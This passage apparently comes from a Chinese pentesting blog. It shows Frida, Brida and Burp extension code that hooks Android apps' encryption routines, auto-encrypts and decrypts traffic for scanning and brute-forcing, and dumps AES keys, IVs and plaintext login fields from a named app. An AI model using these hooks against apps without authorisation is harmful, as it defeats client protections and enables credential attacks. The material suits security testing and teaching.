          } catch(Exception e) {
            stderr.println(e.toString());
            StackTraceElement[] exceptionElements = e.getStackTrace();
            for(int i=0; i< exceptionElements.length; i++) {
              stderr.println(exceptionElements[i].toString());
            }
          }
          // Update the messageInfo object with the modified request (otherwise the request remains the old one)
          byte[] newResponse = ArrayUtils.addAll(Arrays.copyOfRange(response, 0, bodyOffset),ret.getBytes());
          messageInfo.setResponse(newResponse);
        }
      }
    }
  }
}

实战

如图app对数据进行了加密。

这里我们可以通过直接分析APK或者通过Hook来看他是使用的什么加密，且调用的是那个类的那个方法。

逆向APP可以知道调用的类和方法。

同时得到加密密钥为：9876543210123456

我们可以利用Execute method模块进行函数调用测试。修改contextcustom1

contextcustom1: function(message) {
        console.log("Brida  Java Starting script ---->ok");
        var enc;
        Java.perform(function () {
            try {
                var key = "9876543210123456";
                var text = "admin";
                //hook class
                var AesEncryptionBase64 = Java.use('com.ese.http.encrypt.AesEncryptionBase64');
                console.log("Brida start : encrypt before--->"+text);
                //hook method
                enc = AesEncryptionBase64.encrypt(key,text);
                console.log("Brida start : encrypt after--->"+enc);

            } catch (error) {
                console.log("[!]Exception:" + error.message);
            }
        });
        return enc;
    },

如上是hookcom.ese.http.encrypt.AesEncryptionBase64类的encrypt方法，并传入key值和加密内容。

可得到加密后的密文。

4个方法与请求数据包与返回数据包相互一一对应：

Brida Custom 1：通过右键菜单进行访问，它会调用contextcustom1 JS脚本；
Brida Custom 2：通过右键菜单进行访问，它会调用contextcustom2 JS脚本；
Brida Custom 3：通过右键菜单进行访问，它会调用contextcustom3 JS脚本；
Brida Custom 4：通过右键菜单进行访问，它会调用contextcustom4 JS脚本。

编写加密解密脚本：（函数接收的参数和返回的数据都是以 16进制编码的，所以我们使用时要先对他们进行16进制解码，然后返回的时候在进行16进制编码。）

//AesEncryptionBase64 encrypt
contextcustom1: function (message) {
    console.log("Brida start :0--->" + message);
    var data = hexToString(message)
    console.log("Brida start :1--->" + data);
    var enc;
    Java.perform(function () {
        try {
            var key = "9876543210123456";
            var text = data;
            //hook class
            var AesEncryptionBase64 = Java.use('com.ese.http.encrypt.AesEncryptionBase64');
            console.log("Brida start : AesEncryptionBase64 ---> success");
            console.log("Brida start : encrypt before--->"+text);
            //hook method
            enc = AesEncryptionBase64.encrypt(key,text);
            console.log("Brida start : encrypt after--->"+enc);

        } catch (error) {
            console.log("[!]Exception:" + error.message);
        }
    });
    return stringToHex(enc);
},

//AesEncryptionBase64 decrypt
contextcustom2: function (message) {
    console.log("Brida start :0--->" + message);
    var data = hexToString(message)
    console.log("Brida start :1--->" + data);
    var text;
    Java.perform(function () {
        try {
            var key = "9876543210123456";
            var enc = data;
            //hook class
            var AesEncryptionBase64 = Java.use('com.ese.http.encrypt.AesEncryptionBase64');
            console.log("Brida start : AesEncryptionBase64 ---> success");
            console.log("Brida start : decrypt before--->"+enc);
            //hook method
            text = AesEncryptionBase64.decrypt(key,enc);
            console.log("Brida start : decrypt after--->"+text);
        } catch (error) {
            console.log("[!]Exception:" + error.message);
        }
    });
    console.log("Brida start : decrypt after--->"+stringToHex(text));
    return stringToHex(text);
},

//AesEncryptionBase64 encrypt
contextcustom3: function (message) {
    console.log("Brida start :0--->" + message);
    var data = hexToString(message)
    console.log("Brida start :1--->" + data);
    var enc;
    Java.perform(function () {
        try {
            var key = "9876543210123456";
            var text = data;
            //hook class
            var AesEncryptionBase64 = Java.use('com.ese.http.encrypt.AesEncryptionBase64');
            console.log("Brida start : AesEncryptionBase64 ---> success");
            console.log("Brida start : encrypt before--->"+text);
            //hook method
            enc = AesEncryptionBase64.encrypt(key,text);
            console.log("Brida start : encrypt after--->"+enc);

        } catch (error) {
            console.log("[!]Exception:" + error.message);
        }
    });
    return stringToHex(enc);
},

//AesEncryptionBase64 decrypt
contextcustom4: function (message) {
    console.log("Brida start :0--->" + message);
    var data = hexToString(message)
    console.log("Brida start :1--->" + data);
    var text;
    Java.perform(function () {
        try {
            var key = "9876543210123456";
            var enc = data;
            //hook class
            var AesEncryptionBase64 = Java.use('com.ese.http.encrypt.AesEncryptionBase64');
            console.log("Brida start : AesEncryptionBase64 ---> success");
            console.log("Brida start : decrypt before--->"+enc);
            //hook method
            text = AesEncryptionBase64.decrypt(key,enc);
            console.log("Brida start : decrypt after--->"+text);
        } catch (error) {
            console.log("[!]Exception:" + error.message);
        }
    });
    console.log("Brida start : decrypt after--->"+stringToHex(text));
    return stringToHex(text);
}

替换脚本里的contextcustom函数。

这样就能在burpsuite中进行右键菜单转换了。

接下来实现自定义插件实现在reperter、scanner、intruder模板中自动加密请求包和解密返回包。

为了让处理加解密数据更方便，所以就改变了一下服务端加解密的方式。

这里我用的python编写插件。所以需要安装jython

推荐安装最新版的jython-installer-2.7.2b3.jar

https://repo1.maven.org/maven2/org/python/jython-installer/2.7.2b3/jython-installer-2.7.2b3.jar

同时使用jython自带的pip安装Pyro4

1	pip install pyro4

burp中配置最新安装好pyro4的路径。

然后用python编写burp插件。

申明一个类，继承于IBurpExtender和IHttpListener：

1	`class` `BurpExtender(IBurpExtender, IHttpListener)`

重写registerExtenderCallbacks和processHttpMessage:

def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        self._callbacks.setExtensionName("fuck encrypt by Uknow!")
        callbacks.registerHttpListener(self)

def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
    # tool https://portswigger.net/burp/extender/api/constant-values.html#burp.IBurpExtenderCallbacks
    if toolFlag == 64 or toolFlag == 16 or toolFlag == 32: # TOOL_REPEATER     TOOL_SCANNER     TOOL_INTRUDER
        request = messageInfo.getRequest()
        analyzedRequest = self._helpers.analyzeRequest(request)
        headers = analyzedRequest.getHeaders()
        if not messageIsRequest:
            response = messageInfo.getResponse()
            analyzedResponse = self._helpers.analyzeResponse(response)
            messageInfo.setResponse(self.decrypt(analyzedResponse, response))
        # elif toolFlag != 4:
        else:
            messageInfo.setRequest(self.encrypt(analyzedRequest, request))

对着toolFlag一顿if是为了过滤Burp的模块，判断他是从哪过来的，这里是过滤了三个：reperter、scanner、intruder，抓包过来的无需处理，如果你处理了那APP就不能正常收发数据了。
self.decrypt和self.encrypt就是去跟Brida开的端口交换数据，处理加解密：

def decrypt(self, RequestOrResponse,raw):    uri = 'PYRO:BridaServicePyro@localhost:9999'    pp = Pyro4.Proxy(uri)    body = raw[RequestOrResponse.getBodyOffset():]    newbody = body.tostring()    args = []    args.append(newbody.encode('hex'))    ret = pp.callexportfunction('contextcustom4',args)    ret = self._helpers.bytesToString(ret).decode('hex')    return self._helpers.buildHttpMessage(RequestOrResponse.getHeaders(), ret)def encrypt(self, RequestOrResponse,raw):    uri = 'PYRO:BridaServicePyro@localhost:9999'    pp = Pyro4.Proxy(uri)    body = raw[RequestOrResponse.getBodyOffset():]    newbody = body.tostring()    args = []    args.append(newbody.encode('hex'))    ret = pp.callexportfunction('contextcustom1',args)    ret = self._helpers.bytesToString(ret).decode('hex')    return self._helpers.buildHttpMessage(RequestOrResponse.getHeaders(), ret)

用callexportfunction来调用你刚才js脚本里rpc.exports里的函数，参数是函数名和参数列表。

完整代码如下：

from burp import IBurpExtender
from burp import IHttpListener
from burp import IHttpRequestResponse
from burp import IResponseInfo
from burp import IProxyListener
import Pyro4


print 'uknowsec.cn'

class BurpExtender(IBurpExtender,IHttpListener,IHttpRequestResponse, IProxyListener):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        self._callbacks.setExtensionName("fuck encrypt by Uknow!")
        callbacks.registerHttpListener(self)

    def decrypt(self, RequestOrResponse,raw):
        uri = 'PYRO:BridaServicePyro@localhost:9999'
        pp = Pyro4.Proxy(uri)
        body = raw[RequestOrResponse.getBodyOffset():]
        newbody = body.tostring()
        args = []
        args.append(newbody.encode('hex'))
        ret = pp.callexportfunction('contextcustom4',args)
        ret = self._helpers.bytesToString(ret).decode('hex')
        return self._helpers.buildHttpMessage(RequestOrResponse.getHeaders(), ret)
 
    def encrypt(self, RequestOrResponse,raw):
        uri = 'PYRO:BridaServicePyro@localhost:9999'
        pp = Pyro4.Proxy(uri)
        body = raw[RequestOrResponse.getBodyOffset():]
        newbody = body.tostring()
        args = []
        args.append(newbody.encode('hex'))
        ret = pp.callexportfunction('contextcustom1',args)
        ret = self._helpers.bytesToString(ret).decode('hex')
        return self._helpers.buildHttpMessage(RequestOrResponse.getHeaders(), ret)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        # tool https://portswigger.net/burp/extender/api/constant-values.html#burp.IBurpExtenderCallbacks
        if toolFlag == 64 or toolFlag == 16 or toolFlag == 32: # TOOL_REPEATER     TOOL_SCANNER     TOOL_INTRUDER
            request = messageInfo.getRequest()
            analyzedRequest = self._helpers.analyzeRequest(request)
            headers = analyzedRequest.getHeaders()
            if not messageIsRequest:
                response = messageInfo.getResponse()
                analyzedResponse = self._helpers.analyzeResponse(response)
                messageInfo.setResponse(self.decrypt(analyzedResponse, response))
            # elif toolFlag != 4:
            else:
                messageInfo.setRequest(self.encrypt(analyzedRequest, request))

然后加载就可以在reperter、scanner、intruder模块中实现自动加密解密了。操作如下图。

比如如上场景可直接进行爆破。

自动以插件也可以使用Java编写，可以根据文章前文给出的官方文档给出的示例进行修改。

lxhToolHTTPDecrypt

https://github.com/lyxhh/lxhToolHTTPDecrypt

HTTP Decrypt 提供了Finds Hooks模块，可以在不逆向不脱壳的情况下快速的找到APP所使用的加解密算法，而toBurp模块提供了直接使用APP内的方法进行加解密，而不需自己动手敲代码，对于整体POST加密更是提供了自动化加解密功能，可以实现Burp一条龙，Burp Scanner ，Intruder自动加解密。

python3 app.py
Android_frida_server 运行
转发frida端口。
打开HTTP Decrypt页面，如果在Start界面出现应用包名列表信息则可正常使用其他功能，如果不行，刷新一下看看控制台出现的信息。

Hooks

填写字符串，将类名与你填写的字符串匹配，并Hooks类下的所有方法，hook多个类名，回车换行。

在APP中进行操作，尽量进行多次操作，让脚本hook到所有方法。

如下图，这里找到了加密方法为com.ese.http.encrypt.AesEncryptionBase64.encrypt

Stack

像Brida一样也可以显示Hooks打印的堆栈。

Finds

根据字符串，查找类，匹配到类，将类下的方法都打印出来。多个查找回车换行继续写。提供了过滤机制。

匹配的不是很准确，可能是我姿势有问题，但是我们可以自己去反编译或者通过hook来判断哪个是加解密方法。

toBurp

添入我们得到加解密方法。

然后点击Confirm按钮，之后再点击Add按钮，将方法的信息添加到左边的info里面去，因为加解密方法有两个参数，无法使用HTTPDecrypt自动的生成的脚本（自动生成的脚本只能适应一个参数），所以我们需要自己写一些代码，接下来我们点击Generate export static script按钮。（因为方法类型是静态的所以选择static按钮，动态的选择instance，如果你很熟悉frida，点哪个都无所谓。）

HTTPDecrypt会将一些代码生成在Custom选项卡中，如下：

像Brida修改代码，添加key值。encrypt方法的第一个参数是一个固定值key，通过反编译和hook分析可以得到。第二个参数为加密内容。

'use strict';

var rpc_result = null;
var rpc_result_ios = null;
rpc.exports = {


tag3c57a19c2806a2b4d3f028f23c7d2f4f02: function(arg0, arg1){
        Java.perform(function () {
            try{
                var key = "9876543210123456";
// var context = Java.use('android.app.ActivityThread').currentApplication().getApplicationContext();
                var AesEncryptionBase64bc9333b9adb0ceb7cc6c929d900e3365 = Java.use("com.ese.http.encrypt.AesEncryptionBase64");
                rpc_result = AesEncryptionBase64bc9333b9adb0ceb7cc6c929d900e3365.encrypt(key, arg0);
                // send(JSON.stringify({"aa":"bb","aa1":"bbb"})+'-cusoto0oom0sc0ri0pt-')
            }catch(e){send("tag3c57a19c2806a2b4d3f028f23c7d2f4f02, " + e + "-er00roo000r-")}
        });
        return rpc_result;
    },
// Added Function 


}

同样的方法修改解密方法。如图

loadscript加载脚本。

这样我们可以得到两个方法名，和brida中的contextcustom一样。

然后我们将这两个方法名添入burp插件配置项里

同样就可以通过右键菜单栏进行加解密了。

他也具有自动加解密的功能，但是目前只能对整个请求包进行加解密不能匹配到需要加解密的数据。

通过burp发给服务端的数据可以看到，在看起自动加解密后他把整个请求body进行了加密，跟服务端验证不符合，所以存在一定的局限性。

通过修改服务端代码，和请求包格式。

我们改成客户端把整个请求包body进行加密，给后端验证的方法。体验一下自动加解密。

对比总结

Brida的插桩功能好像有点不好使，lxhToolHTTPDecrypt的hook功能对APP进行多次操作后，效果还是挺好的。但定位加解密方法还是要人工的去分析，工具只是辅助作用。
Brida和lxhToolHTTPDecrypt的右键菜单功能其实是相同的原理，绑定函数去调用函数进行加解密得到返回值
Brida灵活性强一点，可以自定义编写插件。但是这也是比较麻烦的一点，对于不熟悉BURP插件编写的使用者是一个难点，lxhToolHTTPDecrypt方便一点，他不需要自己去写插件对数据进行处理，但是他只能对整个body进行自动加解密，存在一定局限性。而在Brida中可以在编写脚本的过程中对需要加解密的内容进行灵活的操作，lxhToolHTTPDecrypt目前还在不断的更新，可能作者后面会解决这个问题。

frida-hook实战二

2020-01-07T15:38:13.000Z

Traceview+frida

TraceView 是 Android SDK 中内置的一个工具，它可以加载 trace 文件，用图形的形式展示代码的执行时间、次数及调用栈。

利用mprop工具修改当前手机应用都可以调试

使用DDMS时，只能看到手机，看不到进程信息，这样我们就不能获取指定进程的信息

如果需要调试android 的程序，以下两个条件满足一个就行。第一是apk的配置文件内的AndroidManifest.xml的 android:debuggable=”true”，第二就是/default.prop中ro.debuggable=1。两种方式第一种通常是解包添加属性再打包，随着加壳软件以及apk校验等，容易出现安装包异常。第二种由于一般的手机发布时ro.debuggable一般是0 也就是不允许调试，通过修改rom的办法在手机上比较麻烦，需要刷机等等，模拟器上一般是vmdk的虚拟机，也没法修改rom。

这里我们可以直接用mprop这个工具，可以直接修改android属性。

同样有不同的版本，通过adb上传到模拟机，修改属性值。

arm:

adb push .\libs\armeabi-v7a\mprop /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/mprop"
adb shell "/data/local/tmp/mprop"
adb shell "setprop ro.debuggable 1"

x86:

adb push .\libs\x86\mprop /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/mprop"
adb shell "/data/local/tmp/mprop"
adb shell "setprop ro.debuggable 1"

这样我们就能看到进行信息了

TraceView 追踪函数

这里用到的是DDMS中的traceview工具，直接下载android-sdk工具包，运行里面的ddms.bat即可。

如图选定进程名，选择Trace based profiling。

触发APP条件事件（比如Click或者刷新）生成.trace文件，这样我们就可以看到整个用堆栈过程。

对比AES的解密实现，只需要如下三个点得到，key、模式和iv值就行了。

key值和iv值是构造函数，根据hook构造函数的方法，要用到$init，并且要return this.$init(arg1,arg2)调用原始的函数实现，同时IvParameterSpec方法的参数是一个比特数组的重载函数。

Java中比特数组表示为[B，其他类型的数组如下表示。

[Z = boolean
[B = byte
[S = short
[I = int
[J = long
[F = float
[D = double
[C = char
[L = any non-primitives(Object)

在frida利用如下方式输出比特数组：

for (i=0;i
   {
       b=(arg1[i]>>>0)&0xff;
       n=b.toString(16);
       hexstr += ("00" + n).slice(-2)+" ";
   }

完整jscode:

Java.perform(function x() {
    // Function to hook is defined here
    var UtiEncrypt = Java.use('com.bianlidai123.bc.encrypt.UtiEncrypt');

    // Whenever button is clicked
    UtiEncrypt.decryptAES.overload('java.lang.String').implementation = function (arg1) {
        // Show a message to know that the function got called
       

       var sign=this.decryptAES(arg1);
             
       send("arg1:"+arg1);
       send("sign:"+sign);
       return sign;
       
    };
    
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function (arg1) {
         var sign2=this.getInstance(arg1);
         send("Instance:"+arg1);
         return sign2;
    
    };

    var SecretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec');
    SecretKeySpec.$init.overload('[B', 'java.lang.String').implementation = function (arg1,arg2) {
     hexstr="";
    for (i=0;i
    {
        b=(arg1[i]>>>0)&0xff;
        n=b.toString(16);
        hexstr += ("00" + n).slice(-2)+" ";
    }
        send("Key: " + hexstr);
      //send("init1:"+arg1+arg2);
        return this.$init(arg1,arg2);
    
    };
    
    var IvParameterSpec = Java.use('javax.crypto.spec.IvParameterSpec');
    IvParameterSpec.$init.overload('[B').implementation = function (arg1) {
    hexstr="";
    for (i=0;i
    {
        b=(arg1[i]>>>0)&0xff;
        n=b.toString(16);
        hexstr += ("00" + n).slice(-2)+" ";
    }
        send("Iv: " + hexstr);
      //send("init4:"+arg1);
        return this.$init(arg1);
    
    };
    
});

hook java原生算法同时打印调用堆栈

如下脚本可以hook java原生MD5、MAC、DES、AES、RSA加密算法并打印出调用堆栈，简单暴力。

# -*- coding: UTF-8 -*-
import frida, sys
 
jsCode = """
function showStacks() {
    Java.perform(function() {
        send(Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new()));
    });
}

function bytesToHex(arr) {
    var str = "";
    for (var i = 0; i < arr.length; i++) {
        var tmp = arr[i];
        if (tmp < 0) {
            tmp = (255 + tmp + 1).toString(16);
        } else {
            tmp = tmp.toString(16);
        }
        if (tmp.length == 1) {
            tmp = "0" + tmp;
        }
        str += tmp;
    }
    return str;
}
function bytesToBase64(e) {
    var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
    var r, a, c, h, o, t;
    for (c = e.length, a = 0, r = ''; a < c;) {
        if (h = 255 & e[a++], a == c) {
            r += base64EncodeChars.charAt(h >> 2),
            r += base64EncodeChars.charAt((3 & h) << 4),
            r += '==';
            break
        }
        if (o = e[a++], a == c) {
            r += base64EncodeChars.charAt(h >> 2),
            r += base64EncodeChars.charAt((3 & h) << 4 | (240 & o) >> 4),
            r += base64EncodeChars.charAt((15 & o) << 2),
            r += '=';
            break
        }
        t = e[a++],
        r += base64EncodeChars.charAt(h >> 2),
        r += base64EncodeChars.charAt((3 & h) << 4 | (240 & o) >> 4),
        r += base64EncodeChars.charAt((15 & o) << 2 | (192 & t) >> 6),
        r += base64EncodeChars.charAt(63 & t)
    }
    return r
}
function bytesToString(arr) {
    if (typeof arr === 'string') {
        return arr;
    }
    var str = '',
    _arr = arr;
    for (var i = 0; i < _arr.length; i++) {
        var one = _arr[i].toString(2),
        v = one.match(/^1+?(?=0)/);
        if (v && one.length == 8) {
            var bytesLength = v[0].length;
            var store = _arr[i].toString(2).slice(7 - bytesLength);
            for (var st = 1; st < bytesLength; st++) {
                store += _arr[st + i].toString(2).slice(2);
            }
            str += String.fromCharCode(parseInt(store, 2));
            i += bytesLength - 1;
        } else {
            str += String.fromCharCode(_arr[i]);
        }
    }
    return str;
}

Java.perform(function () {
    var secretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec');
    secretKeySpec.$init.overload('[B','java.lang.String').implementation = function (a,b) {
        showStacks();
        var result = this.$init(a, b);
        send("======================================");
        send("算法名：" + b + "|Dec密钥:" + bytesToString(a));
        send("算法名：" + b + "|Hex密钥:" + bytesToHex(a));
        return result;
    }
    var mac = Java.use('javax.crypto.Mac');
    mac.getInstance.overload('java.lang.String').implementation = function (a) {
        showStacks();
        var result = this.getInstance(a);
        send("======================================");
        send("算法名：" + a);
        return result;
    }
    mac.update.overload('[B').implementation = function (a) {
        showStacks();
        this.update(a);
        send("======================================");
        send("update:" + bytesToString(a))
    }
    mac.update.overload('[B','int','int').implementation = function (a,b,c) {
        showStacks();
        this.update(a,b,c)
        send("======================================");
        send("update:" + bytesToString(a) + "|" + b + "|" + c);
    }
    mac.doFinal.overload().implementation = function () {
        showStacks();
        var result = this.doFinal();
        send("======================================");
        send("doFinal结果(hex):" + bytesToHex(result));
        send("doFinal结果(base64):" + bytesToBase64(result));
        return result;
    }
    mac.doFinal.overload('[B').implementation = function (a) {
        showStacks();
        var result = this.doFinal(a);
        send("======================================");
        send("doFinal参数:" + bytesToString(a));
        send("doFinal结果(hex):" + bytesToHex(result));
        send("doFinal结果(base):" + bytesToBase64(result));
        return result;
    }
        var md = Java.use('java.security.MessageDigest');
    md.getInstance.overload('java.lang.String','java.lang.String').implementation = function (a,b) {
        showStacks();
        send("======================================");
        send("算法名：" + a);
        return this.getInstance(a, b);
    }
    md.getInstance.overload('java.lang.String').implementation = function (a) {
        showStacks();
        send("======================================");
        send("算法名：" + a);
        return this.getInstance(a);
    }
    md.update.overload('[B').implementation = function (a) {
        showStacks();
        send("======================================");
        send("update:" + bytesToString(a))
        return this.update(a);
    }
    md.update.overload('[B','int','int').implementation = function (a,b,c) {
        showStacks();
        send("======================================");
        send("update:" + bytesToString(a) + "|" + b + "|" + c);
        return this.update(a,b,c);
    }
    md.digest.overload().implementation = function () {
        showStacks();
        send("======================================");
        var result = this.digest();
        send("digest结果(hex):" + bytesToHex(result));
        send("digest结果(base64):" + bytesToBase64(result));
        return result;
    }
    md.digest.overload('[B').implementation = function (a) {
        showStacks();
        send("======================================");
        send("digest参数:" + bytesToString(a));
        var result = this.digest(a);
        send("digest结果(hex):" + bytesToHex(result));
        send("digest结果(base64):" + bytesToBase64(result));
        return result;
    }
        var ivParameterSpec = Java.use('javax.crypto.spec.IvParameterSpec');
    ivParameterSpec.$init.overload('[B').implementation = function (a) {
        showStacks();
        var result = this.$init(a);
        send("======================================");
        send("iv向量:" + bytesToString(a));
        send("iv向量(hex):" + bytesToHex(a));
        return result;
    }
    var cipher = Java.use('javax.crypto.Cipher');
    cipher.getInstance.overload('java.lang.String').implementation = function (a) {
        showStacks();
        var result = this.getInstance(a);
        send("======================================");
        send("模式填充:" + a);
        return result;
    }
    cipher.update.overload('[B').implementation = function (a) {
        showStacks();
        var result = this.update(a);
        send("======================================");
        send("update:" + bytesToString(a));
        return result;
    }
    cipher.update.overload('[B','int','int').implementation = function (a,b,c) {
        showStacks();
        var result = this.update(a,b,c);
        send("======================================");
        send("update:" + bytesToString(a) + "|" + b + "|" + c);
        return result;
    }
    cipher.doFinal.overload().implementation = function () {
        showStacks();
        var result = this.doFinal();
        send("======================================");
        send("doFinal结果(hex):" + bytesToHex(result));
        send("doFinal结果(base64):" + bytesToBase64(result));
        return result;
    }
    cipher.doFinal.overload('[B').implementation = function (a) {
        showStacks();
        var result = this.doFinal(a);
        send("======================================");
        send("doFinal参数:" + bytesToString(a));
        send("doFinal结果(hex):" + bytesToHex(result));
        send("doFinal结果(base64):" + bytesToBase64(result));
        return result;
    }
    var x509EncodedKeySpec = Java.use('java.security.spec.X509EncodedKeySpec');
    x509EncodedKeySpec.$init.overload('[B').implementation = function (a) {
        showStacks();
        var result = this.$init(a);
        send("======================================");
        send("RSA密钥:" + bytesToBase64(a));
        return result;
    }
    var rSAPublicKeySpec = Java.use('java.security.spec.RSAPublicKeySpec');
    rSAPublicKeySpec.$init.overload('java.math.BigInteger','java.math.BigInteger').implementation = function (a,b) {
        showStacks();
        var result = this.$init(a,b);
        send("======================================");
        //send("RSA密钥:" + bytesToBase64(a));
        send("RSA密钥N:" + a.toString(16));
        send("RSA密钥E:" + b.toString(16));
        return result;
    }
});
""";
 
fw = open(sys.argv[1],'w+',encoding='utf-8')
 
def message(message, data):
    if message["type"] == 'send':
        print(u"[*] {0}".format(message['payload']))
        fw.write(u"[*] {0}\n".format(message['payload']))
        fw.flush()
    else:
        print(message)
 
process = frida.get_remote_device().attach(sys.argv[1])
script= process.create_script(jsCode)
script.on("message", message)
script.load()
sys.stdin.read()

python frida-hook.py com.faloo.BookReader4Android脚本加上包名，即可hook所有原生方法。

如图某APP登录处，从burp里的流量记录，流量被加密了，在hook脚本中也打印了该段加密数据。

该脚本会在同目录下生成同包名的文件。

[*] ======================================
[*] 算法名：AES|Dec密钥:DD240BF148903189BF8DAE0C220C9591
[*] 算法名：AES|Hex密钥:4444323430424631343839303331383942463844414530433232304339353931
[*] java.lang.Exception
at javax.crypto.Cipher.getInstance(Native Method)
at com.faloo.util.AES.encrypt(Proguard:211)
at com.faloo.util.EncryptUtil._e18(Native Method)
at com.faloo.util.EncryptUtil.getAESEncrypt(Proguard:150)
at com.faloo.network.module.b.a(Proguard:49)
at com.faloo.network.util.e.a(Proguard:174)
at com.faloo.network.service.a.c.a(Proguard:141)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] 模式填充:AES/CBC/PKCS5Padding
[*] java.lang.Exception
at javax.crypto.spec.IvParameterSpec.(Native Method)
at com.faloo.util.AES.encrypt(Proguard:212)
at com.faloo.util.EncryptUtil._e18(Native Method)
at com.faloo.util.EncryptUtil.getAESEncrypt(Proguard:150)
at com.faloo.network.module.b.a(Proguard:49)
at com.faloo.network.util.e.a(Proguard:174)
at com.faloo.network.service.a.c.a(Proguard:141)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] iv向量:                
[*] iv向量(hex):00000000000000000000000000000000
[*] java.lang.Exception
at javax.crypto.Cipher.doFinal(Native Method)
at com.faloo.util.AES.encrypt(Proguard:213)
at com.faloo.util.EncryptUtil._e18(Native Method)
at com.faloo.util.EncryptUtil.getAESEncrypt(Proguard:150)
at com.faloo.network.module.b.a(Proguard:49)
at com.faloo.network.util.e.a(Proguard:174)
at com.faloo.network.service.a.c.a(Proguard:141)
at com.faloo.app.activity.LoginPageActivity$13.a(Proguard:941)
at io.reactivex.internal.operators.observable.ObservableCreate.b(Proguard:40)
at io.reactivex.e.a(Proguard:11194)
at io.reactivex.internal.operators.observable.ObservableSubscribeOn$a.run(Proguard:96)
at io.reactivex.k$a.run(Proguard:463)
at io.reactivex.internal.schedulers.ScheduledRunnable.run(Proguard:66)
at io.reactivex.internal.schedulers.ScheduledRunnable.call(Proguard:57)
at java.util.concurrent.FutureTask.run(FutureTask.java:237)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:152)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:265)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)
at java.lang.Thread.run(Thread.java:818)

[*] ======================================
[*] doFinal参数:num=0&userid=1388888888&Password=9c9c5f3bff756cf5395265b6c5f0d8f0&tid=2&ts=1578400865589&nonce=fb4f89a9464e3a318111b337f92a9f1c&resign=e8ca11ce1d27aa18ed6840617b8cbcf7&pwdcode=YTEyMzQ1Ng==
&time=2020-01-07 21:31:33&wt=1&uuid=77a0332f1ca14daf9337f941bcc86e70&appversion=3.4.8&Type=Android&xp=0
[*] doFinal结果(hex):5a2439af1041cdd1bd1df38a9d6107932190b83cf6be7610cc54767ee4c97bb6236dc4e9d4b00e7408b9add01d8f9423eebd8d75386c20c1c84f8751104f50c9408f2b28af82d3eab9c56b442984c399d65581bdf68815dea6430166767e8538ba7349846e87ed1322b79066e7dac527587c0c7d9950046e63a87af64ce479e5113fcdfe3f35d0a40f8bdc917142d943ad0224bf0315c967fb969abb2178a1c764e311c67aaaebd6d69362a7fdf2bb64040db54443572fa897cd1733ef9dcd4733a35881083082ebdd2cc41a8d169de824b621e73445b3a5004fccd4b091095f0f2c2efc87116f82723c6e59c7c379c2a0eeeecb6c0deefdda2b1581b5a0e56c7ba7f1eaca8f59acae5a2e5c24d5dc72736a1fc1c0cb7e68336b3365ad250e00f89ba09971403c2ed265a2cd62a9fdc4
